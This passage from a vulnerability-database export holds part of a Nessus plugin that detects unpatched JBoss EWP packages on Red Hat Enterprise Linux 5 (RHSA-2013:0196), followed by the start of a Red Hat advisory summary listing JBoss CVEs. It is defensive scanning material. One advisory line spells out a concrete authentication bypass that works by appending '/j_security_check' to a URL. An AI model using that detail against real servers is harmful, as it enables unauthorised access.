value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0196\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"google-guice-2.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"javassist-3.12.0-6.SP1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-core-2.2.21-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-naming-5.0.3-5.1.CP02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-client-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-tp-licenses-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-ws-native-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-cxf-ewp-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbosssx2-2.0.5-8.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jgroups-2.6.22-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-federation-2.1.5-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-ewp-docs-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-ewp-docs-examples-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"wss4j-1.5.12-4.1_patch_02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-security-1.5.1-2.ep5.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:49", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 : JBoss EWP (RHSA-2013:0197)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", 